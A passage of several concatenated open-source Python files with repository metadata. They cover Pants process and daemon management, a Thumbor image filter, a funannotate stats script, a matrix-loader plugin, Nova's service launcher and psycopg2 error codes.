except cls.Timeout:
# Re-raise with a more helpful exception message.
raise cls.Timeout('exceeded timeout of {} seconds while waiting for file {} to appear'
.format(timeout, filename))
def _get_metadata_dir_by_name(self, name):
"""Retrieve the metadata dir by name.
This should always live outside of the workdir to survive a clean-all.
"""
return os.path.join(self._metadata_base_dir, name)
def _maybe_init_metadata_dir_by_name(self, name):
"""Initialize the metadata directory for a named identity if it doesn't exist."""
safe_mkdir(self._get_metadata_dir_by_name(name))
def read_metadata_by_name(self, name, metadata_key, caster=None):
"""Read process metadata using a named identity.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param func caster: A casting callable to apply to the read value (e.g. `int`).
"""
try:
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
return self._maybe_cast(read_file(file_path).strip(), caster)
except (IOError, OSError):
return None
def write_metadata_by_name(self, name, metadata_key, metadata_value):
"""Write process metadata using a named identity.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param string metadata_value: The metadata value (e.g. '1729').
"""
self._maybe_init_metadata_dir_by_name(name)
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
safe_file_dump(file_path, metadata_value)
def await_metadata_by_name(self, name, metadata_key, timeout, caster=None):
"""Block up to a timeout for process metadata to arrive on disk.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param int timeout: The deadline to write metadata.
:param type caster: A type-casting callable to apply to the read value (e.g. int, str).
:returns: The value of the metadata key (read from disk post-write).
:raises: :class:`ProcessMetadataManager.Timeout` on timeout.
"""
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
self._wait_for_file(file_path, timeout=timeout)
return self.read_metadata_by_name(name, metadata_key, caster)
def purge_metadata_by_name(self, name):
"""Purge a processes metadata directory.
:raises: `ProcessManager.MetadataError` when OSError is encountered on metadata dir removal.
"""
meta_dir = self._get_metadata_dir_by_name(name)
logger.debug('purging metadata directory: {}'.format(meta_dir))
try:
rm_rf(meta_dir)
except OSError as e:
raise self.MetadataError('failed to purge metadata directory {}: {!r}'.format(meta_dir, e))
class ProcessManager(ProcessMetadataManager):
"""Subprocess/daemon management mixin/superclass. Not intended to be thread-safe."""
class InvalidCommandOutput(Exception): pass
class NonResponsiveProcess(Exception): pass
class ExecutionError(Exception):
def __init__(self, message, output=None):
super(ProcessManager.ExecutionError, self).__init__(message)
self.message = message
self.output = output
def __repr__(self):
return '{}(message={!r}, output={!r})'.format(type(self).__name__, self.message, self.output)
KILL_WAIT_SEC = 5
KILL_CHAIN = (signal.SIGTERM, signal.SIGKILL)
def __init__(self, name, pid=None, socket=None, process_name=None, socket_type=int,
metadata_base_dir=None):
"""
:param string name: The process identity/name (e.g. 'pantsd' or 'ng_Zinc').
:param int pid: The process pid. Overrides fetching of the self.pid @property.
:param string socket: The socket metadata. Overrides fetching of the self.socket @property.
:param string process_name: The process name for cmdline executable name matching.
:param type socket_type: The type to be used for socket type casting (e.g. int).
:param str metadata_base_dir: The overridden base directory for process metadata.
"""
super(ProcessManager, self).__init__(metadata_base_dir)
self._name = name
self._pid = pid
self._socket = socket
self._socket_type = socket_type
self._process_name = process_name
self._buildroot = get_buildroot()
self._process = None
@property
def name(self):
"""The logical name/label of the process."""
return self._name
@property
def process_name(self):
"""The logical process name. If defined, this is compared to exe_name for stale pid checking."""
return self._process_name
@property
def cmdline(self):
"""The process commandline. e.g. ['/usr/bin/python2.7', 'pants.pex'].
:returns: The command line or else `None` if the underlying process has died.
"""
with swallow_psutil_exceptions():
process = self._as_process()
if process:
return process.cmdline()
return None
@property
def cmd(self):
"""The first element of the process commandline e.g. '/usr/bin/python2.7'.
:returns: The first element of the process command line or else `None` if the underlying
process has died.
"""
return (self.cmdline or [None])[0]
@property
def pid(self):
"""The running processes pid (or None)."""
return self._pid or self.read_metadata_by_name(self._name, 'pid', int)
@property
def socket(self):
"""The running processes socket/port information (or None)."""
return self._socket or self.read_metadata_by_name(self._name, 'socket', self._socket_type)
@classmethod
def get_subprocess_output(cls, command, ignore_stderr=True, **kwargs):
"""Get the output of an executed command.
:param command: An iterable representing the command to execute (e.g. ['ls', '-al']).
:param ignore_stderr: Whether or not to ignore stderr output vs interleave it with stdout.
:raises: `ProcessManager.ExecutionError` on `OSError` or `CalledProcessError`.
:returns: The output of the command.
"""
if ignore_stderr is False:
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
return subprocess.check_output(command, **kwargs)
except (OSError, subprocess.CalledProcessError) as e:
subprocess_output = getattr(e, 'output', '').strip()
raise cls.ExecutionError(str(e), subprocess_output)
def await_pid(self, timeout):
"""Wait up to a given timeout for a process to write pid metadata."""
return self.await_metadata_by_name(self._name, 'pid', timeout, int)
def await_socket(self, timeout):
"""Wait up to a given timeout for a process to write socket info."""
return self.await_metadata_by_name(self._name, 'socket', timeout, self._socket_type)
def write_pid(self, pid=None):
"""Write the current processes PID to the pidfile location"""
pid = pid or os.getpid()
self.write_metadata_by_name(self._name, 'pid', str(pid))
def write_socket(self, socket_info):
"""Write the local processes socket information (TCP port or UNIX socket)."""
self.write_metadata_by_name(self._name, 'socket', str(socket_info))
def write_named_socket(self, socket_name, socket_info):
"""A multi-tenant, named alternative to ProcessManager.write_socket()."""
self.write_metadata_by_name(self._name, 'socket_{}'.format(socket_name), str(socket_info))
def read_named_socket(self, socket_name, socket_type):
"""A multi-tenant, named alternative to ProcessManager.socket."""
return self.read_metadata_by_name(self._name, 'socket_{}'.format(socket_name), socket_type)
def _as_process(self):
"""Returns a psutil `Process` object wrapping our pid.
NB: Even with a process object in hand, subsequent method calls against it can always raise
`NoSuchProcess`. Care is needed to document the raises in the public API or else trap them and
do something sensible for the API.
:returns: a psutil Process object or else None if we have no pid.
:rtype: :class:`psutil.Process`
:raises: :class:`psutil.NoSuchProcess` if the process identified by our pid has died.
"""
if self._process is None and self.pid:
self._process = psutil.Process(self.pid)
return self._process
def is_dead(self):
"""Return a boolean indicating whether the process is dead or not."""
return not self.is_alive()
def is_alive(self, extended_check=None):
"""Return a boolean indicating whether the process is running or not.
:param func extended_check: An additional callable that will be invoked to perform an extended
liveness check. This callable should take a single argument of a
`psutil.Process` instance representing the context-local process
and return a boolean True/False to indicate alive vs not alive.
"""
try:
process = self._as_process()
return not (
# Can happen if we don't find our pid.
(not process) or
# Check for walkers.
(process.status() == psutil.STATUS_ZOMBIE) or
# Check for stale pids.
(self.process_name and self.process_name != process.name()) or
# Extended checking.
(extended_check and not extended_check(process))
)
except (psutil.NoSuchProcess, psutil.AccessDenied):
# On some platforms, accessing attributes of a zombie'd Process results in NoSuchProcess.
return False
def purge_metadata(self, force=False):
"""Instance-based version of ProcessMetadataManager.purge_metadata_by_name() that checks
for process liveness before purging metadata.
:param bool force: If True, skip process liveness check before purging metadata.
:raises: `ProcessManager.MetadataError` when OSError is encountered on metadata dir removal.
"""
if not force and self.is_alive():
raise self.MetadataError('cannot purge metadata for a running process!')
super(ProcessManager, self).purge_metadata_by_name(self._name)
def _kill(self, kill_sig):
"""Send a signal to the current process."""
if self.pid:
os.kill(self.pid, kill_sig)
def terminate(self, signal_chain=KILL_CHAIN, kill_wait=KILL_WAIT_SEC, purge=True):
"""Ensure a process is terminated by sending a chain of kill signals (SIGTERM, SIGKILL)."""
alive = self.is_alive()
if alive:
logger.debug('terminating {}'.format(self._name))
for signal_type in signal_chain:
pid = self.pid
try:
logger.debug('sending signal {} to pid {}'.format(signal_type, pid))
self._kill(signal_type)
except OSError as e:
logger.warning('caught OSError({e!s}) during attempt to kill -{signal} {pid}!'
.format(e=e, signal=signal_type, pid=pid))
# Wait up to kill_wait seconds to terminate or move onto the next signal.
try:
if self._deadline_until(self.is_dead, kill_wait):
alive = False
logger.debug('successfully terminated pid {}'.format(pid))
break
except self.Timeout:
# Loop to the next kill signal on timeout.
pass
if alive:
raise self.NonResponsiveProcess('failed to kill pid {pid} with signals {chain}'
.format(pid=self.pid, chain=signal_chain))
if purge:
self.purge_metadata(force=True)
def daemonize(self, pre_fork_opts=None, post_fork_parent_opts=None, post_fork_child_opts=None,
write_pid=True):
"""Perform a double-fork, execute callbacks and write the child pid file.
The double-fork here is necessary to truly daemonize the subprocess such that it can never
take control of a tty. The initial fork and setsid() creates a new, isolated process group
and also makes the first child a session leader (which can still acquire a tty). By forking a
second time, we ensure that the second child can never acquire a controlling terminal because
it's no longer a session leader - but it now has its own separate process group.
Additionally, a normal daemon implementation would typically perform an os.umask(0) to reset
the processes file mode creation mask post-fork. We do not do this here (and in daemon_spawn
below) due to the fact that the daemons that pants would run are typically personal user
daemons. Having a disparate umask from pre-vs-post fork causes files written in each phase to
differ in their permissions without good reason - in this case, we want to inherit the umask.
"""
self.purge_metadata()
self.pre_fork(**pre_fork_opts or {})
logger.debug('forking %s', self)
pid = os.fork()
if pid == 0:
os.setsid()
second_pid = os.fork()
if second_pid == 0:
try:
os.chdir(self._buildroot)
self.post_fork_child(**post_fork_child_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
try:
if write_pid: self.write_pid(second_pid)
self.post_fork_parent(**post_fork_parent_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
# This prevents un-reaped, throw-away parent processes from lingering in the process table.
os.waitpid(pid, 0)
def daemon_spawn(self, pre_fork_opts=None, post_fork_parent_opts=None, post_fork_child_opts=None):
"""Perform a single-fork to run a subprocess and write the child pid file.
Use this if your post_fork_child block invokes a subprocess via subprocess.Popen(). In this
case, a second fork such as used in daemonize() is extraneous given that Popen() also forks.
Using this daemonization method vs daemonize() leaves the responsibility of writing the pid
to the caller to allow for library-agnostic flexibility in subprocess execution.
"""
self.purge_metadata()
self.pre_fork(**pre_fork_opts or {})
pid = os.fork()
if pid == 0:
try:
os.setsid()
os.chdir(self._buildroot)
self.post_fork_child(**post_fork_child_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
try:
self.post_fork_parent(**post_fork_parent_opts or {})
except Exception:
logger.critical(traceback.format_exc())
def pre_fork(self):
"""Pre-fork callback for subclasses."""
pass
def post_fork_child(self):
"""Pre-fork child callback for subclasses."""
pass
def post_fork_parent(self):
"""Post-fork parent callback for subclasses."""
pass
| {
"content_hash": "dc6893952228cb854c2797a40975ed72",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 100,
"avg_line_length": 40.652977412731005,
"alnum_prop": 0.6749671684008486,
"repo_name": "15Dkatz/pants",
"id": "a545691b75635957d96e810b72ffb9ed91224155",
"size": "19945",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/pants/pantsd/process_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "781"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "1805"
},
{
"name": "HTML",
"bytes": "79866"
},
{
"name": "Java",
"bytes": "481460"
},
{
"name": "JavaScript",
"bytes": "35417"
},
{
"name": "Python",
"bytes": "5884798"
},
{
"name": "Rust",
"bytes": "212512"
},
{
"name": "Scala",
"bytes": "76124"
},
{
"name": "Shell",
"bytes": "67399"
},
{
"name": "Thrift",
"bytes": "2795"
}
],
"symlink_target": ""
} |
from thumbor.filters import BaseFilter, filter_method
from thumbor.ext.filters import _round_corner
class Filter(BaseFilter):
@filter_method(r'[\d]+(?:\|[\d]+)?', BaseFilter.PositiveNumber, BaseFilter.PositiveNumber, BaseFilter.PositiveNumber, BaseFilter.Boolean)
def round_corner(self, radius, r, g, b, transparent=False):
width, height = self.engine.size
radius_parts = radius.split('|')
a_radius = int(radius_parts[0])
b_radius = int(radius_parts[1]) if len(radius_parts) > 1 else a_radius
if transparent:
self.engine.enable_alpha()
mode, data = self.engine.image_data_as_rgb()
imgdata = _round_corner.apply(
1, mode, a_radius, b_radius, r, g, b,
width, height, data, transparent
)
self.engine.set_image_data(imgdata)
| {
"content_hash": "2f4e347e7c900f3ddcc5e526498977ff",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 141,
"avg_line_length": 38.27272727272727,
"alnum_prop": 0.6377672209026128,
"repo_name": "voxmedia/thumbor",
"id": "3c5c4335d060f962205445efca9b3425ff653156",
"size": "1094",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "thumbor/filters/round_corner.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "62441"
},
{
"name": "JavaScript",
"bytes": "409"
},
{
"name": "Makefile",
"bytes": "10255"
},
{
"name": "Python",
"bytes": "596113"
}
],
"symlink_target": ""
} |
import sys
import argparse
import funannotate.library as lib
def main(args):
# setup menu with argparse
class MyFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(MyFormatter, self).__init__(prog, max_help_position=48)
parser = argparse.ArgumentParser(prog='stats.py',
description='''Script to run some simple genome annotation stats''',
epilog="""Written by Jon Palmer (2020) nextgenusfs@gmail.com""",
formatter_class=MyFormatter)
parser.add_argument('-f', '--fasta', required=True,
help='Genome in FASTA format')
parser.add_argument('-o', '--out', required=True,
help='JSON output stats file')
parser.add_argument('-g', '--gff',
help='Genome annotation in GFF3 format')
parser.add_argument('-t', '--tbl',
help='Genome annotation in TBL format')
parser.add_argument('--transcript_alignments',
help='transcript alignments in GFF3 format')
parser.add_argument('--protein_alignments',
help='protein alignments in GFF3 format')
args = parser.parse_args(args)
if not args.gff and not args.tbl:
print('Warning: no genome annotation passed (-t or -g), will only output genome assembly stats')
elif args.tbl:
print('Generating stats from Genome FASTA file and TBL annotation')
lib.annotation_summary(args.fasta, args.out, tbl=args.tbl,
transcripts=args.transcript_alignments,
proteins=args.protein_alignments)
elif args.gff:
print('Generating stats from Genome FASTA file and GFF3 annotation')
lib.annotation_summary(args.fasta, args.out, gff=args.gff,
transcripts=args.transcript_alignments,
proteins=args.protein_alignments)
print('Finished writing JSON stats file: {}'.format(args.out))
if __name__ == "__main__":
main(sys.argv[1:])
| {
"content_hash": "bf2798db2ee842236a8cbc184eef98ec",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 105,
"avg_line_length": 47.08695652173913,
"alnum_prop": 0.58264081255771,
"repo_name": "nextgenusfs/funannotate",
"id": "a38d7fd12e86ffcaec57ceef1c2970632b91947f",
"size": "2213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "funannotate/utilities/stats.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "291"
},
{
"name": "Dockerfile",
"bytes": "2669"
},
{
"name": "JavaScript",
"bytes": "2771"
},
{
"name": "Perl",
"bytes": "138330"
},
{
"name": "Python",
"bytes": "1542730"
},
{
"name": "Scala",
"bytes": "1523"
},
{
"name": "Shell",
"bytes": "2930"
},
{
"name": "Singularity",
"bytes": "100"
}
],
"symlink_target": ""
} |
import masterPlugin
import os
import libHercmIO
## load command plugin
#
# Based on arguments, loads a matrix from a file into WORKINGMATRIX, then
# then returns it as a libHercMatrix.hercMatrix instance
class loader(masterPlugin.masterPlugin):
def __init__(this):
super().__init__()
this.command = "load"
this.aliases = ["l"]
this.commandInfo = {'requiredArguments': [[0, str, 'path']],
'optionalArguments': [[1, str, 'format']],
'argumentInfo': ['The file to load', 'The format of said file'],
'help': """Reads in the file for viewing and manipulation. If format
is not provided, it will be extrapolated from the filename"""}
def execute(this, arguments, WORKINGMATRIX):
filename = arguments[0]
form = None
if len(arguments) == 2:
form = arguments[1]
else:
form = this.extrapolateFormat(arguments[0])
WORKINGMATRIX = libHercmIO.readMatrix(filename, form, True)
return WORKINGMATRIX
def validate(this, arguments, WORKINGMATRIX):
if not super().validate(arguments, WORKINGMATRIX):
return False
if len(arguments) == 1:
if this.extrapolateFormat(arguments[0]) is None:
print("ERROR: could not extrapolate format from filename")
return False
if not os.path.exists(arguments[0]):
print("ERROR: target file does not exist!")
return False
if not os.path.isfile(arguments[0]):
print("ERROR: target is a directory, not a file")
return False
return True
## attempt to extrapolate format from filename
# returns the format if it can be extrapolated, or None if it cannot
def extrapolateFormat(this, filename):
if filename[-3:] == "bxf":
return 'bxf'
if filename[-3:] == 'mat':
return 'mat'
if filename[-3:] == 'mtx':
return 'mtx'
if filename[-5:] == 'hercm':
return 'hercm'
if filename[-6:] == 'valcol':
return 'valcol'
return None
| {
"content_hash": "1ab979dd43e845ffff90f3abd16af835",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 80,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.5828729281767956,
"repo_name": "charlesdaniels/hercm",
"id": "137b423cdbfd17bb0fb58a91151197555cdb2343",
"size": "2172",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python33/menuPlugins/load.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8577"
},
{
"name": "Makefile",
"bytes": "139"
},
{
"name": "Python",
"bytes": "113163"
}
],
"symlink_target": ""
} |
"""Starter script for all nova services.
This script attempts to start all the nova services in one process. Each
service is started in its own greenthread. Please note that exceptions and
sys.exit() on the starting of a service are logged and the script will
continue attempting to launch the rest of the services.
"""
import sys
from oslo.config import cfg
from nova import config
from nova.objectstore import s3server
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova import service
from nova import utils
from nova.vnc import xvp_proxy
CONF = cfg.CONF
CONF.import_opt('manager', 'nova.conductor.api', group='conductor')
CONF.import_opt('topic', 'nova.conductor.api', group='conductor')
CONF.import_opt('enabled_apis', 'nova.service')
CONF.import_opt('enabled_ssl_apis', 'nova.service')
def main():
config.parse_args(sys.argv)
logging.setup("nova")
LOG = logging.getLogger('nova.all')
utils.monkey_patch()
launcher = service.process_launcher()
# nova-api
for api in CONF.enabled_apis:
try:
should_use_ssl = api in CONF.enabled_ssl_apis
server = service.WSGIService(api, use_ssl=should_use_ssl)
launcher.launch_service(server, workers=server.workers or 1)
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s') % '%s-api' % api)
for mod in [s3server, xvp_proxy]:
try:
launcher.launch_service(mod.get_wsgi_server())
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s') % mod.__name__)
for binary in ['nova-compute', 'nova-network', 'nova-scheduler',
'nova-cert', 'nova-conductor']:
# FIXME(sirp): Most service configs are defined in nova/service.py, but
# conductor has set a new precedent of storing these configs
# nova/<service>/api.py.
#
# We should update the existing services to use this new approach so we
# don't have to treat conductor differently here.
if binary == 'nova-conductor':
topic = CONF.conductor.topic
manager = CONF.conductor.manager
else:
topic = None
manager = None
try:
launcher.launch_service(service.Service.create(binary=binary,
topic=topic,
manager=manager))
except (Exception, SystemExit):
LOG.exception(_('Failed to load %s'), binary)
launcher.wait()
| {
"content_hash": "c290a1fbad18f44e0f9bcd9cd5b5e3f3",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 79,
"avg_line_length": 35.4054054054054,
"alnum_prop": 0.6301526717557252,
"repo_name": "luogangyi/bcec-nova",
"id": "0c44de6e21bd5a087fed459c7d62dcd1d0a485ac",
"size": "3389",
"binary": false,
"copies": "13",
"ref": "refs/heads/stable/icehouse",
"path": "nova/cmd/all.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "4119"
},
{
"name": "Python",
"bytes": "14033515"
},
{
"name": "Shell",
"bytes": "94649"
}
],
"symlink_target": ""
} |
'''
Created on Mar 2, 2013
@author: nino
'''
class PermissionDeniedError(Exception):
pass
class User(object):
def __init__(self, name):
self.name = name
def is_authorized(self, action): return True
def can_throw(self): return False
def increment(self, stat, count=1): pass
| {
"content_hash": "be8ee1e1785749cd7e76ec9b11c9a462",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 48,
"avg_line_length": 15.45,
"alnum_prop": 0.6440129449838188,
"repo_name": "escherba/marx",
"id": "3462aff42af4c4e77cb6b41054808d3e0b153191",
"size": "309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/workflow/example_objects.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "296"
},
{
"name": "Python",
"bytes": "36490"
}
],
"symlink_target": ""
} |
"""Error codes for PostgresSQL
This module contains symbolic names for all PostgreSQL error codes.
"""
# psycopg2/errorcodes.py - PostgreSQL error codes
#
# Copyright (C) 2006-2010 Johan Dahlin <jdahlin@async.com.br>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# Based on:
#
# http://www.postgresql.org/docs/current/static/errcodes-appendix.html
#
def lookup(code, _cache={}):
"""Lookup an error code or class code and return its symbolic name.
Raise `KeyError` if the code is not found.
"""
if _cache:
return _cache[code]
# Generate the lookup map at first usage.
tmp = {}
for k, v in globals().items():
if isinstance(v, str) and len(v) in (2, 5):
tmp[v] = k
assert tmp
# Atomic update, to avoid race condition on import (bug #382)
_cache.update(tmp)
return _cache[code]
# autogenerated data: do not edit below this point.
# Error classes
CLASS_SUCCESSFUL_COMPLETION = '00'
CLASS_WARNING = '01'
CLASS_NO_DATA = '02'
CLASS_SQL_STATEMENT_NOT_YET_COMPLETE = '03'
CLASS_CONNECTION_EXCEPTION = '08'
CLASS_TRIGGERED_ACTION_EXCEPTION = '09'
CLASS_FEATURE_NOT_SUPPORTED = '0A'
CLASS_INVALID_TRANSACTION_INITIATION = '0B'
CLASS_LOCATOR_EXCEPTION = '0F'
CLASS_INVALID_GRANTOR = '0L'
CLASS_INVALID_ROLE_SPECIFICATION = '0P'
CLASS_DIAGNOSTICS_EXCEPTION = '0Z'
CLASS_CASE_NOT_FOUND = '20'
CLASS_CARDINALITY_VIOLATION = '21'
CLASS_DATA_EXCEPTION = '22'
CLASS_INTEGRITY_CONSTRAINT_VIOLATION = '23'
CLASS_INVALID_CURSOR_STATE = '24'
CLASS_INVALID_TRANSACTION_STATE = '25'
CLASS_INVALID_SQL_STATEMENT_NAME = '26'
CLASS_TRIGGERED_DATA_CHANGE_VIOLATION = '27'
CLASS_INVALID_AUTHORIZATION_SPECIFICATION = '28'
CLASS_DEPENDENT_PRIVILEGE_DESCRIPTORS_STILL_EXIST = '2B'
CLASS_INVALID_TRANSACTION_TERMINATION = '2D'
CLASS_SQL_ROUTINE_EXCEPTION = '2F'
CLASS_INVALID_CURSOR_NAME = '34'
CLASS_EXTERNAL_ROUTINE_EXCEPTION = '38'
CLASS_EXTERNAL_ROUTINE_INVOCATION_EXCEPTION = '39'
CLASS_SAVEPOINT_EXCEPTION = '3B'
CLASS_INVALID_CATALOG_NAME = '3D'
CLASS_INVALID_SCHEMA_NAME = '3F'
CLASS_TRANSACTION_ROLLBACK = '40'
CLASS_SYNTAX_ERROR_OR_ACCESS_RULE_VIOLATION = '42'
CLASS_WITH_CHECK_OPTION_VIOLATION = '44'
CLASS_INSUFFICIENT_RESOURCES = '53'
CLASS_PROGRAM_LIMIT_EXCEEDED = '54'
CLASS_OBJECT_NOT_IN_PREREQUISITE_STATE = '55'
CLASS_OPERATOR_INTERVENTION = '57'
CLASS_SYSTEM_ERROR = '58'
CLASS_SNAPSHOT_FAILURE = '72'
CLASS_CONFIGURATION_FILE_ERROR = 'F0'
CLASS_FOREIGN_DATA_WRAPPER_ERROR = 'HV'
CLASS_PL_PGSQL_ERROR = 'P0'
CLASS_INTERNAL_ERROR = 'XX'
# Class 00 - Successful Completion
SUCCESSFUL_COMPLETION = '00000'
# Class 01 - Warning
WARNING = '01000'
NULL_VALUE_ELIMINATED_IN_SET_FUNCTION = '01003'
STRING_DATA_RIGHT_TRUNCATION = '01004'
PRIVILEGE_NOT_REVOKED = '01006'
PRIVILEGE_NOT_GRANTED = '01007'
IMPLICIT_ZERO_BIT_PADDING = '01008'
DYNAMIC_RESULT_SETS_RETURNED = '0100C'
DEPRECATED_FEATURE = '01P01'
# Class 02 - No Data (this is also a warning class per the SQL standard)
NO_DATA = '02000'
NO_ADDITIONAL_DYNAMIC_RESULT_SETS_RETURNED = '02001'
# Class 03 - SQL Statement Not Yet Complete
SQL_STATEMENT_NOT_YET_COMPLETE = '03000'
# Class 08 - Connection Exception
CONNECTION_EXCEPTION = '08000'
SQLCLIENT_UNABLE_TO_ESTABLISH_SQLCONNECTION = '08001'
CONNECTION_DOES_NOT_EXIST = '08003'
SQLSERVER_REJECTED_ESTABLISHMENT_OF_SQLCONNECTION = '08004'
CONNECTION_FAILURE = '08006'
TRANSACTION_RESOLUTION_UNKNOWN = '08007'
PROTOCOL_VIOLATION = '08P01'
# Class 09 - Triggered Action Exception
TRIGGERED_ACTION_EXCEPTION = '09000'
# Class 0A - Feature Not Supported
FEATURE_NOT_SUPPORTED = '0A000'
# Class 0B - Invalid Transaction Initiation
INVALID_TRANSACTION_INITIATION = '0B000'
# Class 0F - Locator Exception
LOCATOR_EXCEPTION = '0F000'
INVALID_LOCATOR_SPECIFICATION = '0F001'
# Class 0L - Invalid Grantor
INVALID_GRANTOR = '0L000'
INVALID_GRANT_OPERATION = '0LP01'
# Class 0P - Invalid Role Specification
INVALID_ROLE_SPECIFICATION = '0P000'
# Class 0Z - Diagnostics Exception
DIAGNOSTICS_EXCEPTION = '0Z000'
STACKED_DIAGNOSTICS_ACCESSED_WITHOUT_ACTIVE_HANDLER = '0Z002'
# Class 20 - Case Not Found
CASE_NOT_FOUND = '20000'
# Class 21 - Cardinality Violation
CARDINALITY_VIOLATION = '21000'
# Class 22 - Data Exception
DATA_EXCEPTION = '22000'
STRING_DATA_RIGHT_TRUNCATION = '22001'
NULL_VALUE_NO_INDICATOR_PARAMETER = '22002'
NUMERIC_VALUE_OUT_OF_RANGE = '22003'
NULL_VALUE_NOT_ALLOWED = '22004'
ERROR_IN_ASSIGNMENT = '22005'
INVALID_DATETIME_FORMAT = '22007'
DATETIME_FIELD_OVERFLOW = '22008'
INVALID_TIME_ZONE_DISPLACEMENT_VALUE = '22009'
ESCAPE_CHARACTER_CONFLICT = '2200B'
INVALID_USE_OF_ESCAPE_CHARACTER = '2200C'
INVALID_ESCAPE_OCTET = '2200D'
ZERO_LENGTH_CHARACTER_STRING = '2200F'
MOST_SPECIFIC_TYPE_MISMATCH = '2200G'
SEQUENCE_GENERATOR_LIMIT_EXCEEDED = '2200H'
NOT_AN_XML_DOCUMENT = '2200L'
INVALID_XML_DOCUMENT = '2200M'
INVALID_XML_CONTENT = '2200N'
INVALID_XML_COMMENT = '2200S'
INVALID_XML_PROCESSING_INSTRUCTION = '2200T'
INVALID_INDICATOR_PARAMETER_VALUE = '22010'
SUBSTRING_ERROR = '22011'
DIVISION_BY_ZERO = '22012'
INVALID_ARGUMENT_FOR_NTILE_FUNCTION = '22014'
INTERVAL_FIELD_OVERFLOW = '22015'
INVALID_ARGUMENT_FOR_NTH_VALUE_FUNCTION = '22016'
INVALID_CHARACTER_VALUE_FOR_CAST = '22018'
INVALID_ESCAPE_CHARACTER = '22019'
INVALID_REGULAR_EXPRESSION = '2201B'
INVALID_ARGUMENT_FOR_LOGARITHM = '2201E'
INVALID_ARGUMENT_FOR_POWER_FUNCTION = '2201F'
INVALID_ARGUMENT_FOR_WIDTH_BUCKET_FUNCTION = '2201G'
INVALID_ROW_COUNT_IN_LIMIT_CLAUSE = '2201W'
INVALID_ROW_COUNT_IN_RESULT_OFFSET_CLAUSE = '2201X'
INVALID_LIMIT_VALUE = '22020'
CHARACTER_NOT_IN_REPERTOIRE = '22021'
INDICATOR_OVERFLOW = '22022'
INVALID_PARAMETER_VALUE = '22023'
UNTERMINATED_C_STRING = '22024'
INVALID_ESCAPE_SEQUENCE = '22025'
STRING_DATA_LENGTH_MISMATCH = '22026'
TRIM_ERROR = '22027'
ARRAY_SUBSCRIPT_ERROR = '2202E'
INVALID_TABLESAMPLE_REPEAT = '2202G'
INVALID_TABLESAMPLE_ARGUMENT = '2202H'
FLOATING_POINT_EXCEPTION = '22P01'
INVALID_TEXT_REPRESENTATION = '22P02'
INVALID_BINARY_REPRESENTATION = '22P03'
BAD_COPY_FILE_FORMAT = '22P04'
UNTRANSLATABLE_CHARACTER = '22P05'
NONSTANDARD_USE_OF_ESCAPE_CHARACTER = '22P06'
# Class 23 - Integrity Constraint Violation
INTEGRITY_CONSTRAINT_VIOLATION = '23000'
RESTRICT_VIOLATION = '23001'
NOT_NULL_VIOLATION = '23502'
FOREIGN_KEY_VIOLATION = '23503'
UNIQUE_VIOLATION = '23505'
CHECK_VIOLATION = '23514'
EXCLUSION_VIOLATION = '23P01'
# Class 24 - Invalid Cursor State
INVALID_CURSOR_STATE = '24000'
# Class 25 - Invalid Transaction State
INVALID_TRANSACTION_STATE = '25000'
ACTIVE_SQL_TRANSACTION = '25001'
BRANCH_TRANSACTION_ALREADY_ACTIVE = '25002'
INAPPROPRIATE_ACCESS_MODE_FOR_BRANCH_TRANSACTION = '25003'
INAPPROPRIATE_ISOLATION_LEVEL_FOR_BRANCH_TRANSACTION = '25004'
